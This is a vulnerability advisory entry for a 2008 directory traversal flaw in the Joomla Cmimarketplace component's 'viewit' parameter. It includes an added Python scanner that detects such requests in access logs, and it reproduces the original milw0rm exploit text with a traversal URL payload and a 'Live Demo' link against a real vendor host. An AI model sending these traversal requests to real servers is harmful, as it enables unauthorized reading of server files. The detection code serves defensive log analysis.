Vendor: Cmimarketplace
By: H!tm@N
CVSS: 7.5 (HIGH)
CWE: 22 (Directory Traversal)
Product Name: Cmimarketplace
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:magnetic_merchandising_inc:cmimarketplace
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component Cmimarketplace Directory Traversal Vulnerability

A directory traversal vulnerability was discovered in the Joomla component Cmimarketplace. The 'index.php' script does not sufficiently sanitize user-supplied input to the 'viewit' parameter, so an attacker can send a specially crafted HTTP request containing directory traversal sequences (e.g. '/../../') to the vulnerable script. Successful exploitation may result in unauthorized access to sensitive files and directories stored on the server.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the component.
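
To check web-server logs for requests matching the 'viewit' traversal described above, the following added example (not part of the original advisory or of the component's code) scans access-log lines for it. The combined log format, the sample lines and the function names are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not from the page); client IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [08/Apr/2009:10:01:12 +0000] "GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1 HTTP/1.1" 200 5120
198.51.100.7 - - [08/Apr/2009:10:01:15 +0000] "GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=%2E%2E%2F%2E%2E%2F&cid=1 HTTP/1.1" 200 4980
203.0.113.20 - - [08/Apr/2009:10:02:40 +0000] "GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=offers&cid=1 HTTP/1.1" 200 7311
203.0.113.20 - - [08/Apr/2009:10:02:44 +0000] "GET /index.php?option=com_cmimarketplace&Itemid=70&viewit=v1..2&cid=1 HTTP/1.1" 200 7290
203.0.113.21 - - [08/Apr/2009:10:03:02 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9012
"""

# client, timestamp and request target of a combined-log-format line (assumed format)
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) [^"]*"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encodings normalise to the same text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    """True if any path segment of the decoded value is exactly '..'."""
    return '..' in re.split(r'[\\/]+', fully_decode(value))

def find_traversal_requests(log_text):
    """Return (client, timestamp, viewit value) for suspicious component requests."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, when, target = match.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if 'com_cmimarketplace' not in params.get('option', []):
            continue  # only requests routed to the affected component
        for value in params.get('viewit', []):
            if has_traversal(value):
                hits.append((client, when, value))
    return hits

if __name__ == '__main__':
    for hit in find_traversal_requests(SAMPLE_LOG):
        print(hit)
```

Matching on whole path segments rather than on the substring '..' keeps values such as 'v1..2' from being flagged.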

Exploit-DB raw data:

#############################################################################
#							                    #
#     Joomla Component Cmimarketplace Directory Traversal Vulnerability     #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de 
[~]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Cmimarketplace (com_cmimarketplace)"  
[~] Date:          "August 2008"
[~] Author:        "Magnetic Merchandising Inc."
[~] E-mail:        "client@ijobid.com"
[~] Author URL:    "www.ijobid.com"

########################################

[~] Exploit: /index.php?option=com_cmimarketplace&Itemid=70&viewit=[Directory]&cid=1

[~] Example: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1

########################################

[~] Live Demo: http://democmi.ijobid.com/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de

########################################

# milw0rm.com [2009-04-08]